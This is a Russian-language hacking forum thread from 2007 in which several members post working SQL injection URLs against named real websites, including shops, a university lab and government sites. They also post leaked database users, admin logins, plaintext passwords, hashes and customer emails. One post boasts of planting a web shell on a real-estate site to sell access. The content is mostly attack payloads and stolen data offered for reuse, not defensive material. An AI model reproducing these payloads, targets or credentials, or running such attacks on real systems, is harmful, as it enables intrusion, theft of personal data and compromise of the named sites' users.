SQL Инъекции

13.10.2007, 20:46

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

С нами: 9828237

Репутация: 778

Код:

http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,version( ),0x3a,database())/*&pi=1&PHPSESSID=

zero@jafo.netdojo.net:4.1.22-standard:zero2

Код:

http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,password)+f rom+users/*&pi=1&PHPSESSID=

rootadmin:cd92a26534dba48cd785cdcc0b3e6bd1 итд.. <395

Код:

http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/*

v115400@dd5428.kasserver.com:4.0.23-Max-log:v115400

𝕏 Twitter Reddit Telegram Копировать ссылку

14.10.2007, 20:39

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

С нами: 9828237

Репутация: 778

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

u32445@10.10.223.235:5.0.45-log:u32445

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+u32445.administrators+limit+0,1/*

admin:ftn-admn
fortun:test
sirius:admn

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email,0x3a,city),3,4,5,6,7,8,9,10,11,12,1 3,14,15+from+u32445.users+limit+0,1/*

sirius:123456:sirius@nm.ru:moscow

Код:

http://www.armofthesea.org/calendar/index.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user(),0x3a,version(),0x3a,database()),26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43/*

aots_default@localhost:4.1.22-standard:aots_default

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4/*&isref=0&page=0&orderby=identity&sort=asc

keiser@blur.compbio.ucsf.edu:5.0.45:keiser

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a,name,0x3a, code),3,4+from+keiser.dbfs_anno/*

3:ЦA^Р ¬>·.—јYRpЧЕ:Cathepsin L Inhibitor:50160
14:BbwГЬ·Ёд`дЩ#:pgp-:pgp-
3:Њ…ЌєkhaУќґ-°а$:Guanylate Cyclase Activator:78251
3:ўsюqcXёk'#$–ё‚:Glucocorticoid:39100 итд

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a,name,0x3a,code),3,4+from+keiser_ca.dbfs_anno/*

08.10.2007, 01:21

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

С нами: 10669286

Репутация: 1942

моя первая инъекция в MSSQL

нашёл:

Код:

http://www.asprilexi.com/games_cat.asp?id=1'

проверил:

Код:

http://www.asprilexi.com/games_cat.asp?id=1+or+1=@@version--

схема таблес:

Код:

http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

выбрал табличку.. лень было искать реальное чтобибудь типа "users" так что выбрал просто не ту что сначала.

Код:

http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('kartasub','cyfd','dtproperties','erevna','static','sysconstraints','syssegments','var','ahcmd','anikei','apostoli','banner','cardview','choice','comd_list','D99_CMD'))--

колонки:

Код:

http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='D99_REG'+AND+COLUMN_NAME+NOT+IN+('data'))--

вывод:

Код:

http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+data+from+D99_REG)--

какойто хз какой язык, поэтому нихрена непонятно.. ну и фик с ним)

23.10.2007, 21:55

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

С нами: 10200612

Репутация: 168

site: http://www.savage.ua/
site: http://www.savage.ru/

Код:

http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,concat(table_schema,'.',table_name),3,4+from+information_schema.tables+limit+17,1/*

savageua.buy
savageua.news
savageua.tech

Код:

http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,column_name,3,4+from+information_schema.columns+where+table_name='buy'+limit+8,1/*

лёгкий прикол

Код:

http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+null,CONVERT(0x3c666f6e7420636f6c6f723d677265656e3e3c68313ed0a2d0b5d0bbd0bed0b3d180d0b5d0b9d0bad0b020416e7469636861743c2f68313e%20USING%20utf8),0x3c623e506f7765722062793c2f623e3c2f666f6e743e3c696d67207372633d687474703a2f2f666f72756d2e616e7469636861742e72752f616e7469636861742f7069632f7261632e6769663e,null/*

09.10.2007, 14:24

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

С нами: 10200612

Репутация: 168

Цитата:

Сообщение от FFFFx029A

Народ, хелп, у когонить случайно незавалялся скрипт или доступ к хакнутому "агенству недвижимости"?
П.С очень нужно, ща вот сам через гуглю ищу дырявые "агенства недвижимости", если найду - выложу)

(Если кто жадный - могу поменять на скрипт инет магазина который я делал сам вручную снуля, вот пример: http://else.com.ua)

-----------------------------------------------------------------------
Вот нашол и залил шелл: http://www.multydom.crimea.ua/error.php
но эт некатит, ибо сделано кривыми руками и больше 20 баксов мне за него недадут...
-----------------------------------------------------------------------

Если кому несложно, выручите меня, буду всегда рад помоч...

P.S нужно чото типа этого агенства недвижимости: http://www.arcoreal.com.ua
(чтоб был поиск по хатам)

вообщето это не в эту тему......
http://www.arcoreal.com.ua/private/sql/
по этому адрессу лежит файт dump.sql
там два хеша. попробуй расшифровать.
админка тут http://www.arcoreal.com.ua/admin

08.10.2007, 15:49

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

С нами: 10669286

Репутация: 1942

моя первая инъекция в PostgreSQL

сам сайт мне дал ещё давно Constantine поэтому даже если боян, прошу не ругать.. просто это был самый короткий путь попробывать свои силы

нашёл:

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=1'

столбцы:

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+1,null,null,null,null,null--

схема.таблес

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null+from+information_schema.tables--

хоть еденичка выводится в 1 всёравно table_name мы поставляем в 2.. ибо в 1 другой тип данных.

выбрали табличку: pg_user
выводим колонки:

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,COLUMN_NAME,null,null,null,null+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=chr(112)||chr(103)||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)--

перевели в char ибо подругому нерааботет(в данном случае)

получаем:

Код:

passwd
usecatupd
useconfig
usecreatedb
usename
usesuper
usesysid
valuntil

выводим:
usename:

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename,null,null,null,null+from+pg_user--

passwd

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,passwd,null,null,null,null+from+pg_user--

объеденим:

Код:

http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename||chr(58)||passwd,null,null,null,null+from+pg_user--

Последний раз редактировалось BlackCats; 08.10.2007 в 16:13..

09.10.2007, 10:05

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

С нами: 10200612

Репутация: 168

Для некоторых будет интересная база))))
Компания одна из групнейших поставщиков ПК техники на Украине
База одна для всех сайтов:
http://www._gb_.ua/
http://www._compass_.com.ua/
http://www._hi-fi_.com.ua/
http://www._delfics_.com/

скл есть почти на всех перечисленных сайтах
http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES)--
интересные таблицы
ShopOrders
ManagerShopPollOtherSources
Articles
Cards
CardsToCustomers
ForumForums
ManagerShopLogins
MHShops
RacingBingo
RacingCards
ShopCustomers

http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+column_NA ME+ FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_NAME= 'ShopCustomers'+an+column_name+not+in+('Customer_I d','Login','Password','First_Name' ,'Last_Name','Middle_Name','Email','Phone','Fax',' Region_id','City_id','Address','Zip','CustomerStat us_Id', 'Company_name','Company_address','Company_zkpo','C ompany_inn','Company_svid','Company_nds','Subscrib e1','Subscribe2','ForumDisplayEmail','Add_Date','M odification_Date','Site'))--

http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+Card_Id,Balance,A ctivationCode,IsActivated+from+Cards--

http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+id,login,password ,ShopName+from+ManagerShopLogins+where+id+not+in(' 1')--

пароли как то форума так и от входа не шифрованы

09.10.2007, 14:33

0x0c0de

Постоянный

Регистрация: 25.05.2007

Сообщений: 448

С нами: 9981026

Репутация: 1564

Классный вывод)

Код:

 
http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,convert(table_name%20using%20utf8),9,0,1,2,3%20from+information_schema.tables/*&SOffset=0

А вот, собственно

Код:

http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,convert(concat(AdminName,0x3a,PassKey)%20using%20utf8),9,0,1,2,3+from+bog_tbladministrator/*&SOffset=0

Ну и еще

user - rad@localhost
version - 4.1.11

Код:

 
http://www.rad.gov.tw/prg/e_disscuss_content.php?id=-21663%20union%20select%201,2,convert(concat(database(),0x3a,user())%20using%20latin1),4,convert(version()%20using%20latin1),6,7,8,9,10,11/*

corporin_impacto@localhost
4.1.22-standard

Код:

http://www.corporinoquia.gov.co/2170/preguntas2.php?proceso=-9%20union%20select%201,user(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*

4.1.8-nt

Код:

http://www.ttjfng.gov.tw/info_detial.php?InfoID=-88%20union%20select%201,2,3,4,5,version()/*

немного юмора

#10

09.10.2007, 14:51

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

С нами: 9828237

Репутация: 778

немного юмора

Код:

http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database( )),5,6,7,8,9,10,11,12,13/*

runilo_mamb1@localhost:4.1.22-standard:runilo_mamb1

Код:

http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(memberName,0x3a,passwd,0x3a,passwordSalt,0x3a,emailAddress,0x3a,ICQ,0x3a,websiteUrl,0x3a,secretQuestion,0x3a,secretAnswer,0x3a,hideEmail,0x3a,location,0x3a,posts),5,6,7, 8,9,10,11,12,13/**/from/**/smf_members/*

Код:

http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,ver sion(),0x3a,database()),10,11,12,13,14,15/*

anakonda_HumorGo@localhost:4.1.22-standard:anakonda_humor2

Код:

http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a, email),10,11,12,13,14,15+from+users/*

Код:

http://www.flighthumor.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0 x3a,database()),10,11,12,13,14,15/*

fh_fh@localhost:4.0.27-standard-log:fh_flighthumor

Внести депозит

Депозит создан

Вывести депозит